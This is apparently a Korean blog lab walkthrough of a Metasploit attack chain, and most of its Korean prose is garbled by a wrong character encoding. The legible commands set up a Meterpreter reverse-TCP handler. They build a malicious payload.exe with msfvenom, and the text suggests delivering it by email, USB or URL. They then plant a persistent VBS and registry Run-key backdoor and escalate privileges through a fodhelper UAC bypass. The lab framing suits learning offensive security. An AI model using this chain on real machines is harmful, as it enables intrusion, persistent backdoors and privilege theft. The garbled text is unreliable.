๋ฉํ์คํ๋ก์ ์์ ๋ช ๋ น์ด msfconsole์ ์คํํ๋ฉด ์์ ๊ฐ์ ํ๋ฉด์ด ๋จ๋ฉด ์ ์์ ์ผ๋ก ์คํํ ๊ฑฐ๋ค.
์ต์คํ๋ก์ ํธ๋ค๋ฌ ์ค์ ํ๊ธฐ.
ํผํด์ ์์คํ ์ ์ฐ๊ฒฐ์ ์์ ํ๋ ค๋ฉด ์ต์คํ๋ก์ ํธ๋ค๋ฌ๋ฅผ ์ค์ ํด์ผ ํฉ๋๋ค. ์ญ๋ฐฉํฅ TCP ํ์ด๋ก๋๋ฅผ ์ฌ์ฉํ ์์ !
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.86.130
set LPORT 4444
Windows์ฉ ํ์ด๋ก๋๋ฅผ ๋ง๋ค ์์ ์ด๋ค. (Meterpreter๋ฅผ ์ฌ์ฉํด์!)
์ด ํ์ด๋ก๋๋ ํผํด์์ ์ปดํจํฐ์์ ์คํ๋๋ฉด C2 ์๋ฒ์ ๋ค์ ์ฐ๊ฒฐ๋๋๋ก ํด์ค๋ค.
C2 ์๋ฒ์ ์์ ์ฃผ์๋ฅผ ๊ตฌ์ฑํ๊ธฐ ์ํด์๋ LHOST, LPORT ์ค์ ์ด ํ์ํ๋ค.
LHOST๋ Kali ๋จธ์ IP ์ฃผ์๋ก ์ง์ ํด์ฃผ์๊ณ , LPORT๋ ๋์ค์ ๋ณ๊ฒฝ๊ฐ๋ฅํ๋ค๊ธธ๋ ์ผ๋จ ์์ ํฌํธ 4444(default)๋ก ํด์ฃผ์๋ค.
๊ทธ ํ ํธ๋๋ฌ๋ฅผ ์คํํด์ฃผ์๋ค. exploit -j
ํ์ด๋ก๋ ๋ฐ ์์ ๋งค๊ฐ๋ณ์๋ฅผ ์ค์ ํ์ ํธ๋ค๋ฌ๋ฅผ ์์ํ์ฌ ๋ค์ด์ค๋ ์ฐ๊ฒฐ์ ์์ ํ ์ ์๋ค.
๊ทธ๋ฌ๋ฉด ๋ฐฑ๊ทธ๋ผ์ด๋์์ ์ต์คํ๋ก์ ํธ๋ค๋ฌ๊ฐ ์คํ๋์ด ํผํด์๊ฐ ์ฐ๊ฒฐ๋ ๋๊น์ง ๊ธฐ๋ค๋ฆฐ๋ค.
2. ํผํด์๋ฅผ ์ํ(?) ํ์ด๋ก๋ ์์ฑ
์ด์ ํผํด์ ์ธก์์ ์ค์ ์ ํด์ฃผ์ด์ผ ํ๋ค.
MSFVenom์ ์ฌ์ฉํ์ฌ ํ์ด๋ก๋๋ฅผ ์์ฑํด๋ณด๊ฒ ๋ค.
Windows ์์คํ ์์ ์คํ๋ ๋ C2 ์๋ฒ์ ๋ค์ ์ฐ๊ฒฐํ๋ ์ ์ฑ ์คํ ํ์ผ์ ์์ฑํ๊ฒ ๋๋ค.
LHOST = Kali Linux ๋จธ์ IP ์ฃผ์
LPORT = ์์คํ ์ด ์์ ๋๊ธฐ ์ค์ธ ํฌํธ
-f exe = Windows ์คํ ํ์ผ์ ์ง์
-o payload.exe = ์ถ๋ ฅ ํ์ผ ์ด๋ฆ์ payload.exe๋ก ์ง์
ํ์ด๋ก๋(payload.exe)๋ฅผ ํผํด์์ ์ปดํจํฐ์ ์ ๋ฌํด์ผ ํ๋ค. ์ด ์ ๋ฌ์ ์ด๋ฉ์ผ ์ฒจ๋ถ ํ์ผ, USB, URL ๋ฑ๋ฑ์ ๋ฐฉ์์ ํตํด ์ํ๋ ์ ์๋ค.
ํผํด์๊ฐ payload.exe๋ฅผ ์คํํ๋ฉด Kali Linux์ C2 ์๋ฒ์ ๋ค์ ์ฐ๊ฒฐ์ ์๋ํ๋ค.
์ฐ์คใ 22
์ฐ์ ์ ๊ธฐํ๋ค!!
๋ด์น๊น์ ๋ฐฑ๋์ด๋ ํด๋ณด์.
๋ฐฑ๋์ด๋ฅผ ๋ง๋ค๊ธฐ ์ํด์๋ ์ธ์ ์์ด๋๋ฅผ ์์์ผํ๋ค.
์์ถ!!!~~
exploit/windows/local/persistence ๋ชจ๋์ ์ฌ์ฉํ์ฌ ์๊ตฌ ๋ฐฑ๋์ด๋ฅผ ์ฑ๊ณต์ ์ผ๋ก ์ค์ ํ๋ค
VBS ์คํฌ๋ฆฝํธ ์์ฑ๋จ: VBS(Visual Basic Script) ํ์ผ์ด Windows ๋์ C:\Users\victim\AppData\Local\Temp\ ๋๋ ํฐ๋ฆฌ์ ํ์ผ ์ด๋ฆ RoTRQVJ.vbs๋ก ๊ธฐ๋ก๋์์ผ๋ฉฐ, ์ด ์คํฌ๋ฆฝํธ๋ ์ฌ์ฉ์ ๋ก๊ทธ์ธ ์ ์๋์ผ๋ก ์คํ๋๋ ๋ฐฑ๋์ด๋ค๋ค
์๊น๋ ๋งํ๋ฏ์ด RoTRQVJ.vbs๋ผ๋ ์ด๋ฆ์ VBS ์คํฌ๋ฆฝํธ๊ฐ ์์ฑ๋์๋ค(Visual Basic Script)
์ด ์คํฌ๋ฆฝํธ๋ ์ฌ์ฉ์ ๋ก๊ทธ์ธ ์ ์๋์ผ๋ก ์คํ๋๋ ๋ฐฑ๋์ด๋ค!!
๊ทธ๋ฆฌ๊ณ Windows ๋ ์ง์คํธ๋ฆฌ์ ์๋ ์คํ ํญ๋ชฉ์ด ์์ฑ๋์๋ค.(๋ฐ์ค๋ถ๋ถ)
์ด๊ฑธ ๋ ์ง์คํธ๋ฆฌ ํค๋ผ๊ณ ๋ถ๋ฅด๋๋ฐ ์ด๊ฑด ํผํด์๊ฐ Window ๋ก๊ทธ์ธํ ๋๋ง๋ค VBS ๋ฐฑ๋์ด ์คํฌ๋ฆฝํธ๊ฐ ์คํ๋์ด ์ง์์ฑ์ ์ ์งํ๋๋ก ๋ณด์ฅํ๋ ๊ฑฐ๋ค!(SYSTEM, USER ๋ฒ์ ์ค ๋ USER๊ณจ๋ผ์ ์ด๋ ๊ฒ ๋จ์ฌ)
RC ํ์ผ ์์ฑ๋จ: Meterpreter ๋ฆฌ์์ค(RC) ํ์ผ๋ ์์ฑ๋จ. ์ด RC ํ์ผ์๋ Metasploit์ด ๋์ค์ ์ธ์ ์ ๋ค์ ์ค์ ํ๊ธฐ ์ํด ์๋์ผ๋ก ์คํํ ์ ์๋ ๋ช ๋ น์ด ํฌํจ๋์ด์์ผ๋ฉฐ RC ํ์ผ์ ๋ค์ ์์น์ ์ ์ฅ๋๋ค.
/root/.msf4/logs/persistence/DESKTOP-F1V9586_20241013.2838
๋ด๊ฐ ๋ง๋ ๋ฐฑ๋์ด. ์ฐ๋ ๋ฐฉ๋ฒ๋ ์์์ผ๊ฒ ์ง?
1. use exploit/multi/handler
2.set PAYLOAD windows/meterpreter/reverse_tcp
๋ฐฑ๋์ด๋ฅผ ์์ฑํ ๋ ์ฌ์ฉ๋ ๊ฒ๊ณผ ์ผ์นํ๋๋ก ํ์ด๋ก๋๋ฅผ ์ค์
3.set LHOST 192.168.86.130 # (your attacking machine's IP) ๋ฐฑ๋์ด๊ฐ ๋ค์ ์ฐ๊ฒฐํ LHOST ๋ฐ LPORT(IP ์ฃผ์ ๋ฐ ํฌํธ)๋ฅผ ์ง์ ํด์ผ ํฉ๋๋ค. ์ด๋ ๋ฐฑ๋์ด๋ฅผ ์์ฑํ ๋ ์ฌ์ฉํ ์ค์ ๊ณผ ์ผ์นํด์ผ ํจ!!
set LPORT 4444 # (the port you configured for the backdoor)
4.exploit -j ๋ค๋ฌ๋ฅผ ์์ํ์ฌ ๋ค์ด์ค๋ ์ฐ๊ฒฐ์ ์์
ํผํด์๊ฐ ๋ก๊ทธ์ธํ์ฌ ๋ฐฑ๋์ด๋ฅผ ์คํํ ๋๊น์ง ๋๊ธฐ
5.sessions -l ํ์ฑ ์ธ์ ์ด ๋์ด๋์ด ์์ผ๋ฉด ๋ฐฑ๋์ด๊ฐ ๋ฆฌ์ค๋์ ์ฑ๊ณต์ ์ผ๋ก ์ฐ๊ฒฐ๋์์์ ์๋ฏธ
6. sessions -i <session_id>
์ธ์ ๊ณผ ์ํธ์์ฉ
์ ๊ทผ ๊ถํ์ด ๋ฎ์ ์ฌ์ฉ์๋ก ์ ๊ทผ์ด ๊ฐ๋ฅํ์ง ํ ์คํธ ํด๋ณด์.
๊ถํ์์น์ ์๋ ์๋์ ๊ฐ์
๊ถํ ์์น์ ํด์ผ ๋จ
์ด ์๋๋ฆฌ์ค์์๋ ๊ถํ ์์น์ ํตํด ๋ฃจํธ ๊ถํ์ ํ๋ํด์ผ๋ง secret.txt ํ์ผ์ ๋ณผ ์ ์๋ค.
๊ถํ ์์น์ ์ํ ๋จ๊ณ
0. local_exploit_suggester ?
๋จผ์ ์์คํ ์์ ์ฌ์ฉ ๊ฐ๋ฅํ ๊ถํ ์์น ์ทจ์ฝ์ (Local ์ทจ์ฝ์ ) ์ ์ฐพ์์ผ ํ๋ค.
Meterpreter Shell์์ ์ฌ์ฉ ๊ฐ๋ฅํ ๋ชจ๋ ์ค ์ด๋ฌํ ๊ณผ์ ์ ์๋ํํ ๋ชจ๋, local_exploit_suggester๋ฅผ ์ฌ์ฉํ๋ฉด ๋๋ค.
local_exploit_suggester์ ํตํด ๋ก์ปฌ ์์คํ ์ทจ์ฝ์ ์ ์ฝ๊ฒ ์ฐพ์ ์ ์๊ณ post ๋ชจ๋ ์ค recon์ ํด๋นํ๋ค.
1. ๋ฐฑ๊ทธ๋ผ์ด๋๋ก ๋ณด๋ด๊ธฐ
์ฌ๊ธฐ์ ์ฃผ์ํด์ผ ํ ์ ์ local_exploit_suggester๋ Meterpreter ์ฝ์์์ ์ฌ์ฉ๋๋ ๋ชจ๋์ผ๋ฟ์ด์ง Meterpreter ์ธ์ ๋ด์์ ์ธ ์ ์๋ ๋ชจ๋์ด ์๋๋ผ๋ ์ ์ด๋ค!
๊ทธ๋์ Meterpreter์์ ์ง์ ๋ก๋ํ๋ ๊ฒ ์๋๋ผ Metasploit ์ฝ์์์ ์ฌ์ฉํด์ผ ํ๋ค. (์ด์ฉ์ง Tabํค๊ฐ ์๋จน๋๋ผ ใ ใ )
Meterpreter ์ธ์ ์ ๋ฐฑ๊ทธ๋ผ์ด๋๋ก ๋ณด๋ด์ ์ฌ์ฉํ๋ฉด ๋๋ค.
2. use post/multi/recon/local_exploit_suggester
use post/multi/recon/local_exploit_suggester
1
local_exploit_suggester๋ ๋์ ์์คํ ์ ๋ํด ์ด 196๊ฐ์ ๊ฒ์ฌ๋ฅผ ์คํํ๊ณ ์ ์ฌ์ ์ทจ์ฝ์ ํ๋ ' exploit/windows/local/bypassuac_fodhelper '๋ฅผ ์๋ณํด๋๋ค.
exploit/windows/local/bypassuac_fodhelper๋ ๋์์ด UAC ์ฐํ์ ์ทจ์ฝํ ๊ฒ์ผ๋ก ๋ํ๋จ์ ์๋ฏธํ๋ค. ์ด๋ฅผ ํตํด UAC ํ๋กฌํํธ๋ฅผ ํธ๋ฆฌ๊ฑฐํ์ง ์๊ณ ๋ ์์น๋ ๊ถํ์ผ๋ก ๋ช ๋ น์ ์คํํ ์ ์๊ฒ ๋๋ค.
์ฐพ์ ์ต์คํ๋ก์์ ์ฌ์ฉํด๋ณด์.
์ด ์ทจ์ฝ์ ๊ณผ ๊ฐ์ฅ ๊ด๋ จ ๊น์ ์ต์คํ๋ก์์ bypassuac_fodhelper๋ค.
์ด ๋ชจ๋์ ๋ก๋ํ์ฌ ์คํํด๋ณด์.
bypassuac_fodhelper ์คํํ๊ธฐ
use exploit/windows/local/bypassuac_fodhelper
chcp 65001
'๐ง Linux ์๊ณ ์ฐ์' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
๋ด๊ฐ ํผ์ ํด๋ณธ ์นผ๋ฆฌ ๋ฆฌ๋ ์ค ๊น์๋ณด๊ธฐ (0) | 2024.11.29 |
---|---|
[Metasploit] ๊ณต๊ฒฉ list (1) | 2024.10.18 |
[metasploit] UAC ์ฐํ ๊ถํ ์์น ์๋ _๊ธฐ๋ณธ ์ค์ต (0) | 2024.10.16 |
[๋ฆฌ๋ง2๊ธ2์ฐจ] ์ค๋์ ์ค๋ต๋ ธํธ๐ซ (1) | 2024.09.07 |
[๋ฆฌ๋ง2๊ธ2์ฐจ] ์ค๋์ ์ค๋ต๋ ธํธ๐ซ (1) | 2024.09.01 |